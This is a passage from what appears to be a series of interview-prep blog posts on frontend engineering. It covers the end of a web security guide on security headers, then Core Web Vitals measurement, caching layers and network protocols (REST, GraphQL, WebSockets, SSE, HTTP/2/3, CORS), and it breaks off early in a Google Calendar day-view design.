# Prevent MIME sniffing
X-Content-Type-Options: nosniff

# Force HTTPS for 1 year
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

# Control Referer header
Referrer-Policy: strict-origin-when-cross-origin

# Limit browser features
Permissions-Policy: geolocation=(), microphone=(), camera=()

9. Security Checklist Summary

Priority	Action	Reason
Critical	HTTPS Only	Protects data in transit (MitM attacks)
Critical	Sanitize & Validate	Never trust user input, URL params, or API data
Critical	CSP with nonces	Mitigates XSS by blocking inline scripts
High	HttpOnly cookies	Prevents XSS from stealing session tokens
High	SameSite=Strict cookies	Prevents CSRF attacks
High	No secrets in frontend	Use server-side proxy for sensitive API keys
Medium	SRI for CDN scripts	Prevents supply chain attacks
Medium	Automated dependency audits	Catches vulnerable packages early

10. Interview Tip

"I approach frontend security with defense in depth. For XSS, I use output encoding (textContent over innerHTML), React's automatic escaping, and strict CSP with nonces. For CSRF, I combine SameSite cookies with token validation. For authentication, I prefer short-lived access tokens in memory with refresh tokens in HttpOnly cookies — this limits XSS damage while maintaining usability. I always validate on the server (client validation is just UX), use SRI for CDN scripts, and ensure secure headers are set (HSTS, X-Frame-Options, CSP). For supply chain security, I integrate npm audit into CI/CD."

Core Web Vitals: A Senior Engineer's Guide

Arghya Majumder — Tue, 31 Mar 2026 13:28:19 +0000

Core Web Vitals: A Senior Engineer's Guide

A comprehensive guide to measuring and optimizing Core Web Vitals for system design interviews.

1. What Are Core Web Vitals?

Core Web Vitals are Google's standardized metrics for measuring user experience. They directly impact SEO rankings.

┌─────────────────────────────────────────────────────────────┐
│                    CORE WEB VITALS                          │
├──────────────────┬──────────────────┬──────────────────────┤
│       LCP        │       INP        │        CLS           │
│    Loading       │  Interactivity   │   Visual Stability   │
│                  │                  │                      │
│  < 2.5s GOOD     │  < 200ms GOOD    │   < 0.1 GOOD        │
│  2.5-4s NEEDS    │  200-500ms NEEDS │   0.1-0.25 NEEDS    │
│  > 4s POOR       │  > 500ms POOR    │   > 0.25 POOR       │
└──────────────────┴──────────────────┴──────────────────────┘

2. LCP (Largest Contentful Paint)

What It Measures

The time it takes for the largest visible element to render in the viewport.

┌─────────────────────────────────────────────────────────────┐
│  Timeline                                                    │
│                                                              │
│  0ms ─────────────────────────────────────────────▶ 2500ms  │
│       │              │              │                        │
│       │              │              └── LCP: Hero image      │
│       │              │                  fully painted        │
│       │              │                                       │
│       │              └── FCP: First text painted            │
│       │                                                      │
│       └── TTFB: First byte received                         │
│                                                              │
│  What counts as LCP element:                                 │
│  ├── <img> elements                                         │
│  ├── <image> inside <svg>                                   │
│  ├── <video> poster image                                   │
│  ├── Background image via CSS url()                         │
│  └── Block-level text elements (<h1>, <p>, etc.)            │
└─────────────────────────────────────────────────────────────┘

Measuring LCP

// Using web-vitals library
import { onLCP } from 'web-vitals';

onLCP((metric) => {
  console.log('LCP:', metric.value);
  console.log('LCP Element:', metric.entries[0]?.element);
  console.log('Rating:', metric.rating);  // 'good', 'needs-improvement', 'poor'

  // Send to analytics
  sendToAnalytics({
    name: 'LCP',
    value: metric.value,
    id: metric.id,
    rating: metric.rating
  });
});

// Using PerformanceObserver directly
const observer = new PerformanceObserver((list) => {
  const entries = list.getEntries();
  const lastEntry = entries[entries.length - 1];

  console.log('LCP:', lastEntry.startTime);
  console.log('Element:', lastEntry.element);
});

observer.observe({ type: 'largest-contentful-paint', buffered: true });

Optimizing LCP

Cause	Solution
Slow server response	CDN, edge caching, optimize backend
Render-blocking resources	Inline critical CSS, defer JS
Slow resource load	Preload LCP image, use CDN
Client-side rendering	SSR/SSG for above-fold content

<!-- Preload the LCP image -->
<link rel="preload" as="image" href="/hero.jpg" fetchpriority="high">

<!-- For responsive images -->
<link rel="preload" as="image" href="/hero.jpg"
      imagesrcset="hero-400.jpg 400w, hero-800.jpg 800w"
      imagesizes="100vw">

<!-- Inline critical CSS -->
<style>
  .hero-image {
    width: 100%;
    height: auto;
    aspect-ratio: 16/9;
  }
</style>

<!-- Prioritize LCP image -->
<img src="hero.jpg" fetchpriority="high" alt="Hero">

3. INP (Interaction to Next Paint)

What It Measures

INP measures the latency of all user interactions throughout the page lifecycle and reports the worst one (at the 98th percentile).

User clicks button
       │
       ▼
┌──────────────────┐
│  Input Delay     │  ← Time waiting in queue (main thread busy)
│  (event queued)  │
└────────┬─────────┘
         │
         ▼
┌──────────────────┐
│  Processing Time │  ← Event handler execution time
│  (handler runs)  │
└────────┬─────────┘
         │
         ▼
┌──────────────────┐
│  Presentation    │  ← Time for browser to paint the result
│  Delay           │
└────────┬─────────┘
         │
         ▼
    Next Paint

INP = Input Delay + Processing Time + Presentation Delay

Why INP Replaced FID

Metric	What It Measures	Problem
FID	Only FIRST interaction delay	Easy to game (fast initial load, slow later)
INP	ALL interactions, reports worst	Measures real user experience

Measuring INP

import { onINP } from 'web-vitals';

onINP((metric) => {
  console.log('INP:', metric.value);
  console.log('Rating:', metric.rating);

  // The interaction that caused the worst INP
  const entry = metric.entries[0];
  console.log('Interaction target:', entry.target);
  console.log('Interaction type:', entry.name);  // 'click', 'keydown', etc.
});

// Manual measurement with PerformanceObserver
const observer = new PerformanceObserver((list) => {
  for (const entry of list.getEntries()) {
    // entry.duration = total interaction time
    // entry.processingStart - entry.startTime = input delay
    // entry.processingEnd - entry.processingStart = processing time

    if (entry.duration > 200) {
      console.warn('Slow interaction:', {
        type: entry.name,
        duration: entry.duration,
        target: entry.target
      });
    }
  }
});

observer.observe({ type: 'event', buffered: true, durationThreshold: 16 });

Optimizing INP

// ❌ BAD - Long task blocks main thread
button.addEventListener('click', () => {
  // 200ms of synchronous work
  processLargeDataset(data);
  updateUI();
});

// ✅ GOOD - Yield to main thread
button.addEventListener('click', async () => {
  // Show immediate feedback
  button.classList.add('loading');

  // Yield control back to browser
  await scheduler.yield?.() || new Promise(r => setTimeout(r, 0));

  // Do heavy work
  processLargeDataset(data);
  updateUI();
});

// ✅ BETTER - Use Web Worker for heavy computation
const worker = new Worker('processor.js');

button.addEventListener('click', () => {
  button.classList.add('loading');
  worker.postMessage(data);
});

worker.onmessage = (e) => {
  updateUI(e.data);
  button.classList.remove('loading');
};

// ✅ Break up work with requestIdleCallback
function processInChunks(items, callback) {
  const queue = [...items];

  function processNext(deadline) {
    while (queue.length > 0 && deadline.timeRemaining() > 0) {
      const item = queue.shift();
      callback(item);
    }

    if (queue.length > 0) {
      requestIdleCallback(processNext);
    }
  }

  requestIdleCallback(processNext);
}

Cause	Solution
Long event handlers	Break into smaller tasks, yield
Heavy computation	Move to Web Worker
Large DOM updates	Virtual DOM, batch updates
Third-party scripts	Defer, facade pattern

4. CLS (Cumulative Layout Shift)

What It Measures

CLS quantifies how much visible elements unexpectedly shift during page load.

┌─────────────────────────────────────────────────────────────┐
│  Before Ad Loads              After Ad Loads                 │
│  ┌────────────────┐           ┌────────────────┐            │
│  │    Header      │           │    Header      │            │
│  ├────────────────┤           ├────────────────┤            │
│  │    Article     │           │      AD        │ ← Inserted │
│  │    Content     │           ├────────────────┤            │
│  │                │           │    Article     │ ← Shifted! │
│  │   [Button]     │           │    Content     │            │
│  └────────────────┘           │   [Button]     │ ← Misclick!│
│                               └────────────────┘            │
│                                                              │
│  CLS Score = Impact Fraction × Distance Fraction            │
│                                                              │
│  Impact: % of viewport affected                              │
│  Distance: How far elements moved (as % of viewport)         │
└─────────────────────────────────────────────────────────────┘

The CLS Formula

Layout Shift Score = Impact Fraction × Distance Fraction

Impact Fraction = (Area of shifted elements) / (Viewport area)
Distance Fraction = (Max distance moved) / (Viewport height or width)

Example:
- Element covers 50% of viewport (impact = 0.5)
- Element moves 25% of viewport height (distance = 0.25)
- Score = 0.5 × 0.25 = 0.125

Measuring CLS

import { onCLS } from 'web-vitals';

onCLS((metric) => {
  console.log('CLS:', metric.value);
  console.log('Shifts:', metric.entries.length);

  // Identify culprit elements
  metric.entries.forEach(entry => {
    entry.sources?.forEach(source => {
      console.log('Shifted element:', source.node);
    });
  });
});

// Using PerformanceObserver
let clsValue = 0;
let clsEntries = [];

const observer = new PerformanceObserver((list) => {
  for (const entry of list.getEntries()) {
    // Only count unexpected shifts (not from user input)
    if (!entry.hadRecentInput) {
      clsValue += entry.value;
      clsEntries.push(entry);
    }
  }
});

observer.observe({ type: 'layout-shift', buffered: true });

Optimizing CLS

<!-- ✅ Reserve space for images with aspect-ratio -->
<img
  src="photo.jpg"
  width="800"
  height="600"
  style="aspect-ratio: 4/3; width: 100%; height: auto;"
  alt="Photo"
>

<!-- ✅ Reserve space for ads -->
<div class="ad-container" style="min-height: 250px;">
  <!-- Ad loads here -->
</div>

/* ✅ Prevent font swap layout shift */
@font-face {
  font-family: 'CustomFont';
  src: url('font.woff2') format('woff2');
  font-display: optional;  /* or 'swap' with size-adjust */
  size-adjust: 100.5%;     /* Match fallback metrics */
}

/* ✅ Use transform for animations (doesn't cause layout shift) */
.animate {
  transform: translateY(-10px);  /* Good */
}

.animate-bad {
  margin-top: -10px;  /* Bad - causes layout shift */
}

Cause	Solution
Images without dimensions	Always set width/height or aspect-ratio
Ads/embeds without reserved space	Use min-height containers
Dynamically injected content	Insert below fold or reserve space
Web fonts causing FOUT	font-display: optional, or size-adjust
Animations using layout properties	Use transform instead

5. Additional Metrics

TTFB (Time to First Byte)

const navigation = performance.getEntriesByType('navigation')[0];
const ttfb = navigation.responseStart - navigation.requestStart;

// Good: < 800ms
// Needs improvement: 800-1800ms
// Poor: > 1800ms

FCP (First Contentful Paint)

import { onFCP } from 'web-vitals';

onFCP((metric) => {
  console.log('FCP:', metric.value);
  // Good: < 1.8s
});

Long Tasks

// Detect tasks blocking main thread > 50ms
const observer = new PerformanceObserver((list) => {
  for (const entry of list.getEntries()) {
    console.warn(`Long task: ${entry.duration}ms`);

    // Get attribution if available
    if (entry.attribution) {
      console.log('Script:', entry.attribution[0]?.name);
    }
  }
});

observer.observe({ type: 'longtask', buffered: true });

6. Complete Measurement Setup

import { onLCP, onINP, onCLS, onFCP, onTTFB } from 'web-vitals';

function sendToAnalytics(metric) {
  const body = JSON.stringify({
    name: metric.name,
    value: metric.value,
    rating: metric.rating,
    delta: metric.delta,
    id: metric.id,
    navigationType: metric.navigationType,
    // Include page context
    url: window.location.href,
    userAgent: navigator.userAgent,
    connection: navigator.connection?.effectiveType,
    deviceMemory: navigator.deviceMemory
  });

  // Use sendBeacon for reliability (survives page unload)
  if (navigator.sendBeacon) {
    navigator.sendBeacon('/analytics/vitals', body);
  } else {
    fetch('/analytics/vitals', {
      body,
      method: 'POST',
      keepalive: true
    });
  }
}

// Register all Core Web Vitals
onLCP(sendToAnalytics);
onINP(sendToAnalytics);
onCLS(sendToAnalytics);

// Additional helpful metrics
onFCP(sendToAnalytics);
onTTFB(sendToAnalytics);

// Report only once per page
const reported = new Set();
function sendOnce(metric) {
  if (!reported.has(metric.name)) {
    reported.add(metric.name);
    sendToAnalytics(metric);
  }
}

7. Debugging in DevTools

Chrome DevTools Performance Panel

1. Open DevTools → Performance tab
2. Check "Web Vitals" checkbox
3. Click Record, interact with page
4. Stop recording
5. Look for:
   - LCP marker on timeline
   - Layout Shift events (red bars)
   - Long Tasks (gray bars > 50ms)

Lighthouse

1. Open DevTools → Lighthouse tab
2. Select "Performance" category
3. Generate report
4. Check:
   - Core Web Vitals scores
   - "Opportunities" for improvements
   - "Diagnostics" for detailed issues

Web Vitals Extension

Chrome Extension: "Web Vitals"
- Shows real-time CWV scores
- Green/Yellow/Red indicators
- Click for detailed breakdown

8. Lab vs Field Data

Data Type	Source	Use Case
Lab	Lighthouse, DevTools	Development, debugging
Field	CrUX, RUM	Real user experience

┌─────────────────────────────────────────────────────────────┐
│  WHY THEY DIFFER                                             │
│                                                              │
│  Lab Data:                                                   │
│  - Simulated device/network                                  │
│  - No real user interaction                                  │
│  - Consistent, reproducible                                  │
│                                                              │
│  Field Data:                                                 │
│  - Real devices (slow phones!)                              │
│  - Real networks (3G in India!)                             │
│  - Real user behavior                                        │
│                                                              │
│  Field data is what Google uses for rankings!                │
└─────────────────────────────────────────────────────────────┘

Chrome User Experience Report (CrUX)

// Query CrUX API
const response = await fetch(
  `https://chromeuxreport.googleapis.com/v1/records:queryRecord?key=${API_KEY}`,
  {
    method: 'POST',
    body: JSON.stringify({
      url: 'https://example.com',
      metrics: ['largest_contentful_paint', 'interaction_to_next_paint', 'cumulative_layout_shift']
    })
  }
);

const data = await response.json();
console.log('P75 LCP:', data.record.metrics.largest_contentful_paint.percentiles.p75);

9. Quick Reference

Metric	Good	Needs Work	Poor	Primary Cause
LCP	< 2.5s	2.5-4s	> 4s	Slow resource load
INP	< 200ms	200-500ms	> 500ms	Long tasks
CLS	< 0.1	0.1-0.25	> 0.25	Dynamic content

Optimization Cheat Sheet

Metric	Quick Wins
LCP	Preload hero image, inline critical CSS, CDN
INP	Break long tasks, use Web Workers, debounce
CLS	Set image dimensions, reserve ad space, use transform

10. Interview Tip

"I measure Core Web Vitals using the web-vitals library and send data to our analytics backend using sendBeacon for reliability. For LCP, I preload the hero image and inline critical CSS. For INP, I profile with DevTools to find long tasks and break them up using yield points or move heavy computation to Web Workers. For CLS, I ensure all images have explicit dimensions and reserve space for dynamic content like ads. I distinguish between lab and field data—Lighthouse is for debugging, but CrUX/RUM reflects real user experience and is what Google uses for rankings. We track P75 values and set alerts when they degrade."

Caching Strategies: A Senior Engineer's Guide

Arghya Majumder — Tue, 31 Mar 2026 13:24:03 +0000

Caching Strategies: A Senior Engineer's Guide

A comprehensive guide to caching at every layer — from browser to CDN to database — for system design interviews.

1. Client-Side: The "Edge of the Edge"

At a senior level, client-side caching isn't just about localStorage; it's about interception and background synchronization.

Service Workers (The Programmable Proxy)

Service Workers live between the browser and the network, allowing you to implement complex caching logic.

// Stale-While-Revalidate pattern
self.addEventListener('fetch', (event) => {
  event.respondWith(
    caches.open('v1').then(async (cache) => {
      const cachedResponse = await cache.match(event.request);

      // Fetch fresh data in background
      const fetchPromise = fetch(event.request).then((response) => {
        cache.put(event.request, response.clone());
        return response;
      });

      // Return cached immediately, update in background
      return cachedResponse || fetchPromise;
    })
  );
});

Strategy by Request Type

Use request.destination to apply different strategies:

Destination	Strategy	Example
`font`	Cache-Only	Self-hosted web fonts (never change)
`image`	Cache-First	Product images, logos
`document`	Network-First	HTML pages (need fresh content)
`fetch` (API)	Network-First	Real-time stock/API data

Browser HTTP Cache

Controlled by Cache-Control headers.

Fingerprinting Strategy:

# Immutable assets with hash in filename
main.a4f2b3c.js  →  Cache-Control: max-age=31536000, immutable

# HTML files (need revalidation)
index.html      →  Cache-Control: no-cache

Result: Users only download core platform logic once per release.

2. Networking & Infrastructure Layers

This is where you manage the "Thundering Herd" problem and geographical latency.

The Caching Hierarchy

┌─────────────────────────────────────────────────────────────┐
│  Browser Cache                                              │
│  └─▶ Service Worker Cache                                   │
│      └─▶ Forward Proxy (ISP/Corporate)                      │
│          └─▶ CDN Edge (Cloudflare, Akamai)                  │
│              └─▶ Reverse Proxy (Nginx/Varnish)              │
│                  └─▶ Application Cache (Redis)              │
│                      └─▶ Database                           │
└─────────────────────────────────────────────────────────────┘

Forward Proxy Cache (ISP/Corporate Layer)

Caches requests made by users behind a firewall.

The Trap: You have zero control here. If you don't use fingerprinted filenames, a corporate proxy might serve an old version of your React app for weeks.

Fix: Always use content-hashed filenames for static assets.

Reverse Proxy Cache (Gateway Layer)

Your Nginx/Varnish fleet sitting in front of application servers.

Micro-caching Pattern:

# Cache for just 1 second
proxy_cache_valid 200 1s;

For viral real-time endpoints (trending news feed), this collapses 10,000 simultaneous requests into a single origin hit, protecting your backend.

CDN (Edge Caching)

Dynamic Content with ESI (Edge Side Includes)

Assemble pages where some parts are cached longer than others:

<!-- Header cached globally for 24 hours -->
<esi:include src="/fragments/header" />

<!-- User profile fetched dynamically per-request -->
<esi:include src="/fragments/user-profile" />

<!-- Footer cached globally for 24 hours -->
<esi:include src="/fragments/footer" />

Surrogate Keys (Smart Purging)

Instead of purging URLs one by one, tag your assets:

Cache-Tag: product-123, category-electronics

When the product price changes, send one "Purge by Tag" command to clear every related asset globally.

3. Application & Data Layers

Redis vs. Memcached

Feature	Redis	Memcached
Data Structures	Lists, Sets, Hashes, Sorted Sets	Key-Value only
Persistence	Yes (RDB/AOF)	No
Pub/Sub	Yes	No
Threading	Single-threaded	Multi-threaded
Use Case	Complex state, real-time leaderboards	High-throughput simple caching

When to use Redis:

Sorted Set for real-time leaderboard
Pub/Sub to invalidate local caches across 100 app servers
Session storage with TTL

When to use Memcached:

Pure object caching
Maximum throughput for simple key-value lookups

ElastiCache (AWS Managed)

Provides Redis/Memcached with:

Automatic sharding
High availability
Multi-AZ replication

4. Cache Consistency Patterns

Pattern	How It Works	Trade-off
Cache-Aside	App checks cache first, fetches from DB on miss, writes to cache	Simple but risk of stale data
Write-Through	Write to cache AND DB simultaneously	Consistent but slower writes
Write-Behind	Write to cache immediately, flush to DB async	Fast writes but risk of data loss
Read-Through	Cache fetches from DB on miss automatically	Simpler app code

Write-Behind Example (View Counters)

// Increment in Redis immediately (fast)
await redis.incr(`views:article:${id}`);

// Background job flushes to DB every 5 minutes
// Risk: Data loss if Redis fails before flush

5. Special Case: Video Streaming (HLS/DASH)

Streaming requires a "binary-first" caching mindset.

Different TTLs for Different Files

File Type	Purpose	TTL
`.m3u8` / `.mpd` (Manifest)	"Map" of the stream	1-2 seconds
`.ts` / `.m4s` (Segments)	Actual video chunks	Long-term (immutable)

Why Manifests Need Short TTL

#EXTM3U
#EXT-X-TARGETDURATION:6
#EXTINF:6.0,
segment001.ts    ← Already cached at edge
segment002.ts    ← Already cached at edge
segment003.ts    ← NEW! User needs to see this

If manifest is cached too long, users fall behind the live edge.

Low-Latency HLS (LL-HLS)

Uses Blocking Playlist Reload:

1. Client requests manifest
2. CDN sees next segment isn't ready yet
3. CDN HOLDS the request open (doesn't return 404)
4. When segment is ready, CDN returns updated manifest

CDN Config Required: Must support "holding" requests, not immediately returning stale/404.

6. Quick Reference: Cache Headers

Header	Purpose	Example
`Cache-Control`	Main caching directive	`max-age=3600, public`
`ETag`	Content fingerprint for validation	`"abc123"`
`Last-Modified`	Timestamp-based validation	`Wed, 21 Oct 2024 07:28:00 GMT`
`Vary`	Cache separately by header	`Vary: Accept-Encoding`
`Surrogate-Control`	CDN-specific directives	`max-age=86400`
`Cache-Tag`	For tag-based purging	`product-123`

7. Interview Tip

"Caching is about trade-offs between freshness and speed. I use fingerprinted assets with immutable caching for static files, short TTLs with stale-while-revalidate for API data, and micro-caching at the reverse proxy to handle thundering herds. For complex invalidation, I use surrogate keys to purge by tag rather than URL. At the data layer, I choose Redis for complex structures and Pub/Sub invalidation, Memcached for pure throughput."

Network Protocols: A Senior Engineer's Guide

Arghya Majumder — Tue, 31 Mar 2026 13:03:27 +0000

Network Protocols: A Senior Engineer's Guide

A comprehensive guide to REST, GraphQL, WebSockets, and SSE for system design interviews.

1. REST (Representational State Transfer)

REST is the foundation of most web communication, built on the stateless nature of HTTP.

Transport Mechanism

Operates primarily over HTTP/1.1 or HTTP/2:

Version	Behavior
HTTP/1.1	Each request usually requires a new TCP connection (or reuses with overhead)
HTTP/2	Multiplexes multiple requests over a single connection to reduce latency

The "Over-fetching" Problem

A major architectural drawback of REST is that endpoints return a fixed data structure.

GET /users/1

// You only need the name, but you get everything:
{
  "id": 1,
  "name": "John",
  "email": "john@example.com",
  "address": { ... },
  "orderHistory": [ ... ],  // 50KB of data you don't need
  "preferences": { ... }
}

Result: Wasting bandwidth and browser memory.

Caching Strategy (REST's Superpower)

REST is uniquely powerful because it leverages standard HTTP caching headers:

Header	Purpose
`ETag`	Content fingerprint for conditional requests
`Cache-Control`	Tells browser/CDN how long to cache
`Last-Modified`	Timestamp-based cache validation

Browsers and CDNs can natively cache REST responses, significantly reducing server load for static or semi-static data.

2. GraphQL

GraphQL is a query language for APIs that provides a complete and understandable description of the data in your API.

The "Under-fetching" Solution

Unlike REST, which might require three separate calls to get a user, their posts, and their followers, GraphQL fetches all of this in a single round trip.

# One request, all the data you need
query {
  user(id: 1) {
    name
    posts {
      title
    }
    followers {
      name
    }
  }
}

Critical for mobile: High latency on cellular networks makes multiple round trips expensive.

Schema & Type Safety

GraphQL uses a strongly typed schema:

type User {
  id: ID!
  name: String!
  email: String!
  posts: [Post!]!
}

Benefit: Tools like GraphQL Code Generator automatically create TypeScript interfaces, ensuring the frontend never attempts to access a field that doesn't exist.

Architectural Cost

Because GraphQL often uses POST requests for all queries, native browser caching is much harder.

Solutions:

Apollo Client - Sophisticated in-memory cache with normalized data
Relay - Facebook's production-grade caching layer
Persisted Queries - Hash queries to enable GET requests and CDN caching

3. WebSockets (WS)

WebSockets provide a persistent, full-duplex (two-way) communication channel between client and server.

The Handshake

1. Client sends HTTP request with "Upgrade: websocket" header
2. Server responds with "101 Switching Protocols"
3. Protocol switches from HTTP to Binary/Frame-based communication
4. Connection stays open for bidirectional messaging

Framing and Overhead

Protocol	Header Size per Message
HTTP	~800 bytes (cookies, user-agents, etc.)
WebSocket	2-10 bytes (after handshake)

Result: Most efficient protocol for high-frequency data:

Cursor positions in collaborative docs (Google Docs)
Rapid price updates (Trading platforms)
Multiplayer game state

State Management Challenge

Since the connection is persistent, the server must keep a record of every connected client in memory.

Problem: Horizontal scaling is difficult.

Solution: Use a Pub/Sub layer (like Redis) to sync messages across multiple server instances.

┌──────────┐     ┌──────────┐     ┌──────────┐
│ Server 1 │────▶│  Redis   │◀────│ Server 2 │
│ (1000    │     │  Pub/Sub │     │ (1000    │
│  clients)│     └──────────┘     │  clients)│
└──────────┘                      └──────────┘

4. SSE (Server-Sent Events)

SSE is a standard that allows servers to push data to web pages over HTTP.

Unidirectional Flow

Unlike WebSockets, SSE is strictly one-way (Server → Client).

// Client
const eventSource = new EventSource('/notifications');

eventSource.onmessage = (event) => {
  console.log('New notification:', event.data);
};

// Server sends updates whenever available
// data: {"type": "new_message", "count": 5}

Native Advantages

Feature	Benefit
Built on HTTP	Works through most firewalls and proxies without special configuration
Auto-reconnection	Browser automatically tries to reconnect on disconnect
Last-Event-ID	Server can "catch up" on missed messages after reconnect

Best Use Case

SSE is the "goldilocks" protocol for:

News feeds
Stock tickers
Social media notifications
Live sports scores

When to use: User doesn't need to talk back to the server in real-time, but needs to see server updates immediately.

5. Quick Comparison Table

Protocol	Statefulness	Browser Caching	Scalability Complexity	Best For
REST	Stateless	Excellent (Native)	Low	CRUD operations, Public APIs
GraphQL	Stateless	Difficult (Requires Library)	Medium	Complex data requirements, Mobile apps
WebSockets	Stateful	None	High (Requires Pub/Sub)	Real-time bidirectional (Chat, Games)
SSE	Stateful	Limited	Medium	Server push notifications

6. Decision Framework for Interviews

Is the data...
│
├─▶ Static or changes infrequently?
│   └─▶ REST (leverage HTTP caching)
│
├─▶ Complex with nested relationships?
│   └─▶ GraphQL (avoid over/under-fetching)
│
├─▶ Real-time AND bidirectional?
│   └─▶ WebSockets (chat, collaboration, games)
│
└─▶ Real-time BUT server-to-client only?
    └─▶ SSE (notifications, feeds, tickers)

7. Deep Dive: HTTP/2 and HTTP/3

Understanding the transport layer is crucial for Senior-level discussions.

HTTP/1.1 Limitations

┌─────────────────────────────────────────────┐
│  Browser (6 connection limit per domain)    │
│                                             │
│  Conn 1: GET /style.css ──────────────────▶ │
│  Conn 2: GET /app.js ─────────────────────▶ │
│  Conn 3: GET /image1.png ─────────────────▶ │
│  Conn 4: GET /image2.png ─────────────────▶ │
│  Conn 5: GET /image3.png ─────────────────▶ │
│  Conn 6: GET /image4.png ─────────────────▶ │
│                                             │
│  image5.png WAITING... (blocked)            │
└─────────────────────────────────────────────┘

Head-of-Line Blocking: If style.css is slow, it blocks its connection.

HTTP/2 Multiplexing

┌─────────────────────────────────────────────┐
│  Single TCP Connection                      │
│                                             │
│  Stream 1: GET /style.css ──┐               │
│  Stream 2: GET /app.js ─────┼───▶ Server    │
│  Stream 3: GET /image1.png ─┤               │
│  Stream 4: GET /image2.png ─┤               │
│  Stream 5: GET /image3.png ─┘               │
│                                             │
│  All requests sent simultaneously!          │
└─────────────────────────────────────────────┘

Key Features:

Binary Framing: Headers and body are split into frames
Header Compression (HPACK): Reduces header overhead by 85%
Server Push: Server can send resources before client asks

HTTP/3 (QUIC)

Built on UDP instead of TCP:

Feature	HTTP/2 (TCP)	HTTP/3 (QUIC)
Connection Setup	TCP + TLS = 2-3 RTT	0-1 RTT (connection ID persists)
Head-of-Line Blocking	Still exists at TCP level	Eliminated (streams are independent)
Connection Migration	Breaks on IP change	Survives (uses connection ID, not IP)

Mobile Game-Changer: When user switches from WiFi to cellular, HTTP/3 connection survives.

8. CORS: The Security Handshake

Cross-Origin Resource Sharing is the browser's security mechanism for cross-domain requests.

The Preflight Dance

┌──────────┐                           ┌──────────┐
│  Browser │                           │  Server  │
│(app.com) │                           │(api.com) │
└────┬─────┘                           └────┬─────┘
     │                                      │
     │  OPTIONS /api/users                  │
     │  Origin: https://app.com             │
     │  Access-Control-Request-Method: POST │
     │  Access-Control-Request-Headers:     │
     │    Content-Type, Authorization       │
     │─────────────────────────────────────▶│
     │                                      │
     │  204 No Content                      │
     │  Access-Control-Allow-Origin: *      │
     │  Access-Control-Allow-Methods: POST  │
     │  Access-Control-Max-Age: 86400       │
     │◀─────────────────────────────────────│
     │                                      │
     │  POST /api/users (actual request)    │
     │─────────────────────────────────────▶│

When Preflight is Triggered

Request Type	Preflight Required?
`GET` with standard headers	No (Simple Request)
`POST` with `Content-Type: application/json`	Yes
Any request with `Authorization` header	Yes
`PUT`, `DELETE`, `PATCH`	Yes

CORS Headers Reference

# Server response headers
Access-Control-Allow-Origin: https://app.com  # Or * for any
Access-Control-Allow-Methods: GET, POST, PUT
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Credentials: true  # For cookies
Access-Control-Max-Age: 86400  # Cache preflight for 24 hours
Access-Control-Expose-Headers: X-Custom-Header  # Expose to JS

The Credentials Trap

// Frontend
fetch('https://api.com/data', {
  credentials: 'include'  // Send cookies
});

// Backend MUST respond with:
// Access-Control-Allow-Credentials: true
// Access-Control-Allow-Origin: https://app.com  (NOT *)

Rule: When credentials: 'include', you cannot use * for origin.

9. Request Lifecycle: Under the Hood

DNS Resolution

1. Browser checks local cache
2. OS checks /etc/hosts and its cache
3. Query goes to configured DNS resolver (ISP or 8.8.8.8)
4. Resolver checks its cache
5. If miss: Recursive query to root → TLD → Authoritative NS
6. IP address returned and cached (TTL-based)

TCP Connection Establishment (3-Way Handshake)

Client                    Server
   │                         │
   │─────── SYN ────────────▶│  "I want to connect"
   │                         │
   │◀────── SYN-ACK ─────────│  "OK, I acknowledge"
   │                         │
   │─────── ACK ────────────▶│  "Great, connected!"
   │                         │
   │      Connection Open    │

Time Cost: ~1 RTT (Round Trip Time)

TLS Handshake (HTTPS)

Client                           Server
   │                               │
   │─── ClientHello ──────────────▶│  Supported ciphers, random
   │                               │
   │◀── ServerHello + Certificate ─│  Chosen cipher, cert
   │                               │
   │─── Key Exchange + Finished ──▶│  Pre-master secret
   │                               │
   │◀── Finished ──────────────────│
   │                               │
   │     Encrypted Connection      │

Time Cost: ~2 RTT (TLS 1.2) or ~1 RTT (TLS 1.3)

Total for new HTTPS connection: 3-4 RTT before first byte of data!

10. Interview Tip

"The protocol choice depends on the data access pattern. For standard CRUD with good caching needs, REST wins. For complex, nested data on mobile, GraphQL reduces round trips. For real-time bidirectional communication, WebSockets are necessary despite the scaling complexity. For simple server-push scenarios, SSE offers the best simplicity-to-functionality ratio. I also consider the transport layer — HTTP/2 for multiplexing, HTTP/3 for mobile users who switch networks. And for cross-origin security, I ensure proper CORS configuration with preflight caching to minimize overhead."

Google Calendar — Day View

Arghya Majumder — Mon, 30 Mar 2026 20:22:57 +0000

Google Calendar — Day View

Frontend / Backend Split: 40% Backend · 60% Frontend
Google Calendar Day View is frontend-heavy — but the backend is non-trivial. The frontend solves: virtual scrolling a 24-hour grid, drag-and-drop with snapping, overlapping event layout (interval partitioning), and RRULE expansion. The backend solves: ACID event storage, conflict resolution for concurrent edits, and fan-out notifications to shared calendar members. Both sections get full coverage.

1. Problem + Scope

Design the Google Calendar Day View — a time-grid UI that displays all events for a single day, supports creating/editing/deleting events via drag, resize, and click, handles recurring events, and broadcasts real-time updates to shared-calendar collaborators.

In scope: Day view grid, event CRUD, drag & resize, recurring events (RRULE), overlapping event layout, real-time collaboration on shared calendars, all-day events, timezone rendering.

Out of scope: Meeting Room booking, Google Meet integration, calendar migration/import, Google Tasks integration.

2. Assumptions & Scale

Metric	Value
Daily Active Users	500M
Avg events visible in day view	10–20 per user
Peak concurrent users	50M
Event reads (day view load)	3–5 API calls
Peak event writes	10M updates/min → ~167K writes/sec
Event storage per user/year	~10K events × 1KB = 10MB
Total storage	500M × 10MB = 5PB
WebSocket connections (shared calendars)	~5M concurrent

Scale calculation for write path:

167K writes/sec is easily handled by a PostgreSQL cluster with read replicas. No NoSQL needed — events are relational (attendees, calendars, permissions). The fan-out to collaborators (shared calendar update → notify N users) is the harder problem at scale.

These numbers drive the following decisions: PostgreSQL for ACID event storage, Redis for WebSocket session routing, Kafka for fan-out notifications to shared calendar members.

3. Functional Requirements

Display a 24-hour time grid for a selected date, showing all events for the user
Create events via click-and-drag on the grid
Edit events: drag to move (reschedule), drag edge to resize (change duration)
Delete events
Handle overlapping events — render them side-by-side without overlap
Support recurring events defined by RRULE (daily, weekly, monthly, custom)
Show all-day events in a dedicated strip at the top
Render events from multiple calendars with color coding
Real-time sync: if a collaborator edits a shared event, the other user's view updates within 1 second
Timezone-aware: store in UTC, render in the user's local timezone

4. Non-Functional Requirements

Requirement	Target
Initial load latency	< 500ms (events visible)
Drag & resize frame rate	60 fps (no jank)
